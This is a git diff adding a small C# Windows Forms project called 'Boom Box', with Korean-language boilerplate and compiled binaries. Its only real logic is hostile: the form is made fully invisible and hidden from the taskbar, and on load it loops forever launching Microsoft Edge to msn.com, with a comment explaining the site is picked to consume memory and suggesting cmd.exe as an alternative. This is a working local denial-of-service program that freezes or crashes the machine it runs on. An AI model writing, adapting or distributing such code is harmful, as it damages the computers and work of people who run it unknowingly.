diff --git a/Boom Box/App.config b/Boom Box/App.config new file mode 100644 index 0000000..5754728 --- /dev/null +++ b/Boom Box/App.config @@ -0,0 +1,6 @@ + + + + + + \ No newline at end of file diff --git a/Boom Box/Boom Box.csproj b/Boom Box/Boom Box.csproj new file mode 100644 index 0000000..514089f --- /dev/null +++ b/Boom Box/Boom Box.csproj @@ -0,0 +1,83 @@ + + + + + Debug + AnyCPU + {EC74B0D5-C4F1-4236-A30A-52E36C16C91B} + WinExe + Boom_Box + Boom Box + v4.7.2 + 512 + true + true + + + AnyCPU + true + full + false + bin\Debug\ + DEBUG;TRACE + prompt + 4 + + + AnyCPU + pdbonly + true + bin\Release\ + TRACE + prompt + 4 + + + + + + + + + + + + + + + + + Form + + + Form1.cs + + + + + Form1.cs + + + ResXFileCodeGenerator + Resources.Designer.cs + Designer + + + True + Resources.resx + + + SettingsSingleFileGenerator + Settings.Designer.cs + + + True + Settings.settings + True + + + + + + + \ No newline at end of file diff --git a/Boom Box/Form1.Designer.cs b/Boom Box/Form1.Designer.cs new file mode 100644 index 0000000..34aa588 --- /dev/null +++ b/Boom Box/Form1.Designer.cs @@ -0,0 +1,53 @@ + +namespace Boom_Box +{ + partial class Form1 + { + /// + /// 필수 디자이너 변수입니다. + /// + private System.ComponentModel.IContainer components = null; + + /// + /// 사용 중인 모든 리소스를 정리합니다. + /// + /// 관리되는 리소스를 삭제해야 하면 true이고, 그렇지 않으면 false입니다. + protected override void Dispose(bool disposing) + { + if (disposing && (components != null)) + { + components.Dispose(); + } + base.Dispose(disposing); + } + + #region Windows Form 디자이너에서 생성한 코드 + + /// + /// 디자이너 지원에 필요한 메서드입니다. + /// 이 메서드의 내용을 코드 편집기로 수정하지 마세요. + /// + private void InitializeComponent() + { + this.SuspendLayout(); + // + // Form1 + // + this.AutoScaleDimensions = new System.Drawing.SizeF(18F, 30F); + this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font; + this.AutoSizeMode = System.Windows.Forms.AutoSizeMode.GrowAndShrink; + this.ClientSize = new System.Drawing.Size(292, 56); + this.ControlBox = false; + this.Name = "Form1"; + this.Opacity = 0D; + this.ShowIcon = false; + this.ShowInTaskbar = false; + this.Load += new System.EventHandler(this.Form1_Load); + this.ResumeLayout(false); + + } + + #endregion + } +} + diff --git a/Boom Box/Form1.cs b/Boom Box/Form1.cs new file mode 100644 index 0000000..2672ea5 --- /dev/null +++ b/Boom Box/Form1.cs @@ -0,0 +1,36 @@ +using System; +using System.Collections.Generic; +using System.ComponentModel; +using System.Data; +using System.Drawing; +using System.Linq; +using System.Text; +using System.Threading.Tasks; +using System.Windows.Forms; +using Microsoft.Win32; +using System.Diagnostics; + + +namespace Boom_Box +{ + public partial class Form1 : Form + { + public Form1() + { + InitializeComponent(); + } + + private void Form1_Load(object sender, EventArgs e) + { + while (true) + { + Process.Start("microsoftedge.exe", "msn.com"); + //we use msn.com because they need lots of memory sources + + //you can use this also + //Process.Start("microsoftedge.exe"); + //Process.Start("cmd.exe"); + } + } + } +} diff --git a/Boom Box/Form1.resx b/Boom Box/Form1.resx new file mode 100644 index 0000000..29dcb1b --- /dev/null +++ b/Boom Box/Form1.resx @@ -0,0 +1,120 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + text/microsoft-resx + + + 2.0 + + + System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 + + + System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 + + \ No newline at end of file diff --git a/Boom Box/Program.cs b/Boom Box/Program.cs new file mode 100644 index 0000000..0bc640b --- /dev/null +++ b/Boom Box/Program.cs @@ -0,0 +1,22 @@ +using System; +using System.Collections.Generic; +using System.Linq; +using System.Threading.Tasks; +using System.Windows.Forms; + +namespace Boom_Box +{ + static class Program + { + /// + /// 해당 애플리케이션의 주 진입점입니다. + /// + [STAThread] + static void Main() + { + Application.EnableVisualStyles(); + Application.SetCompatibleTextRenderingDefault(false); + Application.Run(new Form1()); + } + } +} diff --git a/Boom Box/Properties/AssemblyInfo.cs b/Boom Box/Properties/AssemblyInfo.cs new file mode 100644 index 0000000..a77b269 --- /dev/null +++ b/Boom Box/Properties/AssemblyInfo.cs @@ -0,0 +1,36 @@ +using System.Reflection; +using System.Runtime.CompilerServices; +using System.Runtime.InteropServices; + +// 어셈블리에 대한 일반 정보는 다음 특성 집합을 통해 +// 제어됩니다. 어셈블리와 관련된 정보를 수정하려면 +// 이러한 특성 값을 변경하세요. +[assembly: AssemblyTitle("Boom Box")] +[assembly: AssemblyDescription("")] +[assembly: AssemblyConfiguration("")] +[assembly: AssemblyCompany("")] +[assembly: AssemblyProduct("Boom Box")] +[assembly: AssemblyCopyright("Copyright © 2023")] +[assembly: AssemblyTrademark("")] +[assembly: AssemblyCulture("")] + +// ComVisible을 false로 설정하면 이 어셈블리의 형식이 COM 구성 요소에 +// 표시되지 않습니다. COM에서 이 어셈블리의 형식에 액세스하려면 +// 해당 형식에 대해 ComVisible 특성을 true로 설정하세요. +[assembly: ComVisible(false)] + +// 이 프로젝트가 COM에 노출되는 경우 다음 GUID는 typelib의 ID를 나타냅니다. +[assembly: Guid("ec74b0d5-c4f1-4236-a30a-52e36c16c91b")] + +// 어셈블리의 버전 정보는 다음 네 가지 값으로 구성됩니다. +// +// 주 버전 +// 부 버전 +// 빌드 번호 +// 수정 버전 +// +// 모든 값을 지정하거나 아래와 같이 '*'를 사용하여 빌드 번호 및 수정 번호를 +// 기본값으로 할 수 있습니다. +// [assembly: AssemblyVersion("1.0.*")] +[assembly: AssemblyVersion("1.0.0.0")] +[assembly: AssemblyFileVersion("1.0.0.0")] diff --git a/Boom Box/Properties/Resources.Designer.cs b/Boom Box/Properties/Resources.Designer.cs new file mode 100644 index 0000000..4455406 --- /dev/null +++ b/Boom Box/Properties/Resources.Designer.cs @@ -0,0 +1,70 @@ +//------------------------------------------------------------------------------ +// +// 이 코드는 도구를 사용하여 생성되었습니다. +// 런타임 버전:4.0.30319.42000 +// +// 파일 내용을 변경하면 잘못된 동작이 발생할 수 있으며, 코드를 다시 생성하면 +// 이러한 변경 내용이 손실됩니다. +// +//------------------------------------------------------------------------------ + + +namespace Boom_Box.Properties +{ + /// + /// 지역화된 문자열 등을 찾기 위한 강력한 형식의 리소스 클래스입니다. + /// + // 이 클래스는 ResGen 또는 Visual Studio와 같은 도구를 통해 StronglyTypedResourceBuilder + // 클래스에서 자동으로 생성되었습니다. + // 멤버를 추가하거나 제거하려면 .ResX 파일을 편집한 다음 /str 옵션을 사용하여 + // ResGen을 다시 실행하거나 VS 프로젝트를 다시 빌드하십시오. + [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")] + [global::System.Diagnostics.DebuggerNonUserCodeAttribute()] + [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()] + internal class Resources + { + + private static global::System.Resources.ResourceManager resourceMan; + + private static global::System.Globalization.CultureInfo resourceCulture; + + [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")] + internal Resources() + { + } + + /// + /// 이 클래스에서 사용하는 캐시된 ResourceManager 인스턴스를 반환합니다. + /// + [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)] + internal static global::System.Resources.ResourceManager ResourceManager + { + get + { + if ((resourceMan == null)) + { + global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("Boom_Box.Properties.Resources", typeof(Resources).Assembly); + resourceMan = temp; + } + return resourceMan; + } + } + + /// + /// 이 강력한 형식의 리소스 클래스를 사용하여 모든 리소스 조회에 대해 현재 스레드의 CurrentUICulture 속성을 + /// 재정의합니다. + /// + [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)] + internal static global::System.Globalization.CultureInfo Culture + { + get + { + return resourceCulture; + } + set + { + resourceCulture = value; + } + } + } +} diff --git a/Boom Box/Properties/Resources.resx b/Boom Box/Properties/Resources.resx new file mode 100644 index 0000000..ffecec8 --- /dev/null +++ b/Boom Box/Properties/Resources.resx @@ -0,0 +1,117 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + text/microsoft-resx + + + 2.0 + + + System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 + + + System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 + + \ No newline at end of file diff --git a/Boom Box/Properties/Settings.Designer.cs b/Boom Box/Properties/Settings.Designer.cs new file mode 100644 index 0000000..590d578 --- /dev/null +++ b/Boom Box/Properties/Settings.Designer.cs @@ -0,0 +1,29 @@ +//------------------------------------------------------------------------------ +// +// This code was generated by a tool. +// Runtime Version:4.0.30319.42000 +// +// Changes to this file may cause incorrect behavior and will be lost if +// the code is regenerated. +// +//------------------------------------------------------------------------------ + + +namespace Boom_Box.Properties +{ + [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()] + [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "11.0.0.0")] + internal sealed partial class Settings : global::System.Configuration.ApplicationSettingsBase + { + + private static Settings defaultInstance = ((Settings)(global::System.Configuration.ApplicationSettingsBase.Synchronized(new Settings()))); + + public static Settings Default + { + get + { + return defaultInstance; + } + } + } +} diff --git a/Boom Box/Properties/Settings.settings b/Boom Box/Properties/Settings.settings new file mode 100644 index 0000000..abf36c5 --- /dev/null +++ b/Boom Box/Properties/Settings.settings @@ -0,0 +1,7 @@ + + + + + + + diff --git a/Boom Box/bin/Debug/Boom Box.exe b/Boom Box/bin/Debug/Boom Box.exe new file mode 100644 index 0000000..6ce27f5 Binary files /dev/null and b/Boom Box/bin/Debug/Boom Box.exe differ diff --git a/Boom Box/bin/Debug/Boom Box.exe.config b/Boom Box/bin/Debug/Boom Box.exe.config new file mode 100644 index 0000000..5754728 --- /dev/null +++ b/Boom Box/bin/Debug/Boom Box.exe.config @@ -0,0 +1,6 @@ + + + + + + \ No newline at end of file diff --git a/Boom Box/bin/Debug/Boom Box.pdb b/Boom Box/bin/Debug/Boom Box.pdb new file mode 100644 index 0000000..3aa3a81 Binary files /dev/null and b/Boom Box/bin/Debug/Boom Box.pdb differ diff --git a/Boom Box/bin/Release/Boom Box.exe b/Boom Box/bin/Release/Boom Box.exe new file mode 100644 index 0000000..44de1f0 Binary files /dev/null and b/Boom Box/bin/Release/Boom Box.exe differ diff --git a/Boom Box/bin/Release/Boom Box.exe.config b/Boom Box/bin/Release/Boom Box.exe.config new file mode 100644 index 0000000..5754728 --- /dev/null +++ b/Boom Box/bin/Release/Boom Box.exe.config @@ -0,0 +1,6 @@ + + + + + + \ No newline at end of file diff --git a/Boom Box/bin/Release/Boom Box.pdb b/Boom Box/bin/Release/Boom Box.pdb new file mode 100644 index 0000000..8ed74fe Binary files /dev/null and b/Boom Box/bin/Release/Boom Box.pdb differ diff --git a/Boom Box/obj/Debug/Boom Box.csproj.AssemblyReference.cache b/Boom Box/obj/Debug/Boom Box.csproj.AssemblyReference.cache new file mode 100644 index 0000000..f5e894a Binary files /dev/null and b/Boom Box/obj/Debug/Boom Box.csproj.AssemblyReference.cache differ diff --git a/Boom Box/obj/Debug/Boom Box.csproj.CoreCompileInputs.cache b/Boom Box/obj/Debug/Boom Box.csproj.CoreCompileInputs.cache new file mode 100644 index 0000000..bfe380c --- /dev/null +++ b/Boom Box/obj/Debug/Boom Box.csproj.CoreCompileInputs.cache @@ -0,0 +1 @@ +8069502011d0681850e57a53d5a1673222f430a6 diff --git a/Boom Box/obj/Debug/Boom Box.csproj.FileListAbsolute.txt b/Boom Box/obj/Debug/Boom Box.csproj.FileListAbsolute.txt new file mode 100644 index 0000000..775ca03 --- /dev/null +++ b/Boom Box/obj/Debug/Boom Box.csproj.FileListAbsolute.txt @@ -0,0 +1,10 @@ +D:\C# programming\overslow project\Boom Box\Boom Box\bin\Debug\Boom Box.exe.config +D:\C# programming\overslow project\Boom Box\Boom Box\bin\Debug\Boom Box.exe +D:\C# programming\overslow project\Boom Box\Boom Box\bin\Debug\Boom Box.pdb +D:\C# programming\overslow project\Boom Box\Boom Box\obj\Debug\Boom Box.csproj.AssemblyReference.cache +D:\C# programming\overslow project\Boom Box\Boom Box\obj\Debug\Boom_Box.Form1.resources +D:\C# programming\overslow project\Boom Box\Boom Box\obj\Debug\Boom_Box.Properties.Resources.resources +D:\C# programming\overslow project\Boom Box\Boom Box\obj\Debug\Boom Box.csproj.GenerateResource.cache +D:\C# programming\overslow project\Boom Box\Boom Box\obj\Debug\Boom Box.csproj.CoreCompileInputs.cache +D:\C# programming\overslow project\Boom Box\Boom Box\obj\Debug\Boom Box.exe +D:\C# programming\overslow project\Boom Box\Boom Box\obj\Debug\Boom Box.pdb diff --git a/Boom Box/obj/Debug/Boom Box.csproj.GenerateResource.cache b/Boom Box/obj/Debug/Boom Box.csproj.GenerateResource.cache new file mode 100644 index 0000000..de490c4 Binary files /dev/null and b/Boom Box/obj/Debug/Boom Box.csproj.GenerateResource.cache differ diff --git a/Boom Box/obj/Debug/Boom Box.exe b/Boom Box/obj/Debug/Boom Box.exe new file mode 100644 index 0000000..6ce27f5 Binary files /dev/null and b/Boom Box/obj/Debug/Boom Box.exe differ diff --git a/Boom Box/obj/Debug/Boom Box.pdb b/Boom Box/obj/Debug/Boom Box.pdb new file mode 100644 index 0000000..3aa3a81 Binary files /dev/null and b/Boom Box/obj/Debug/Boom Box.pdb differ diff --git a/Boom Box/obj/Debug/Boom_Box.Form1.resources b/Boom Box/obj/Debug/Boom_Box.Form1.resources new file mode 100644 index 0000000..6c05a97 Binary files /dev/null and b/Boom Box/obj/Debug/Boom_Box.Form1.resources differ diff --git a/Boom Box/obj/Debug/Boom_Box.Properties.Resources.resources b/Boom Box/obj/Debug/Boom_Box.Properties.Resources.resources new file mode 100644 index 0000000..6c05a97 Binary files /dev/null and b/Boom Box/obj/Debug/Boom_Box.Properties.Resources.resources differ diff --git a/Boom Box/obj/Debug/DesignTimeResolveAssemblyReferences.cache b/Boom Box/obj/Debug/DesignTimeResolveAssemblyReferences.cache new file mode 100644 index 0000000..138cf3b Binary files /dev/null and b/Boom Box/obj/Debug/DesignTimeResolveAssemblyReferences.cache differ diff --git a/Boom Box/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache b/Boom Box/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache new file mode 100644 index 0000000..0e525f1 Binary files /dev/null and b/Boom Box/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache differ diff --git a/Boom Box/obj/Release/Boom Box.csproj.CoreCompileInputs.cache b/Boom Box/obj/Release/Boom Box.csproj.CoreCompileInputs.cache new file mode 100644 index 0000000..5abe8d4 --- /dev/null +++ b/Boom Box/obj/Release/Boom Box.csproj.CoreCompileInputs.cache @@ -0,0 +1 @@ +a05b2efad1c492f69cfd9e73a7de2300da2b5b0d diff --git a/Boom Box/obj/Release/Boom Box.csproj.FileListAbsolute.txt b/Boom Box/obj/Release/Boom Box.csproj.FileListAbsolute.txt new file mode 100644 index 0000000..0f567fb --- /dev/null +++ b/Boom Box/obj/Release/Boom Box.csproj.FileListAbsolute.txt @@ -0,0 +1,9 @@ +D:\C# programming\overslow project\Boom Box\Boom Box\bin\Release\Boom Box.exe.config +D:\C# programming\overslow project\Boom Box\Boom Box\bin\Release\Boom Box.exe +D:\C# programming\overslow project\Boom Box\Boom Box\bin\Release\Boom Box.pdb +D:\C# programming\overslow project\Boom Box\Boom Box\obj\Release\Boom_Box.Form1.resources +D:\C# programming\overslow project\Boom Box\Boom Box\obj\Release\Boom_Box.Properties.Resources.resources +D:\C# programming\overslow project\Boom Box\Boom Box\obj\Release\Boom Box.csproj.GenerateResource.cache +D:\C# programming\overslow project\Boom Box\Boom Box\obj\Release\Boom Box.csproj.CoreCompileInputs.cache +D:\C# programming\overslow project\Boom Box\Boom Box\obj\Release\Boom Box.exe +D:\C# programming\overslow project\Boom Box\Boom Box\obj\Release\Boom Box.pdb diff --git a/Boom Box/obj/Release/Boom Box.csproj.GenerateResource.cache b/Boom Box/obj/Release/Boom Box.csproj.GenerateResource.cache new file mode 100644 index 0000000..d331624 Binary files /dev/null and b/Boom Box/obj/Release/Boom Box.csproj.GenerateResource.cache differ diff --git a/Boom Box/obj/Release/Boom Box.exe b/Boom Box/obj/Release/Boom Box.exe new file mode 100644 index 0000000..44de1f0 Binary files /dev/null and b/Boom Box/obj/Release/Boom Box.exe differ diff --git a/Boom Box/obj/Release/Boom Box.pdb b/Boom Box/obj/Release/Boom Box.pdb new file mode 100644 index 0000000..8ed74fe Binary files /dev/null and b/Boom Box/obj/Release/Boom Box.pdb differ diff --git a/Boom Box/obj/Release/Boom_Box.Form1.resources b/Boom Box/obj/Release/Boom_Box.Form1.resources new file mode 100644 index 0000000..6c05a97 Binary files /dev/null and b/Boom Box/obj/Release/Boom_Box.Form1.resources differ diff --git a/Boom Box/obj/Release/Boom_Box.Properties.Resources.resources b/Boom Box/obj/Release/Boom_Box.Properties.Resources.resources new file mode 100644 index 0000000..6c05a97 Binary files /dev/null and b/Boom Box/obj/Release/Boom_Box.Properties.Resources.resources differ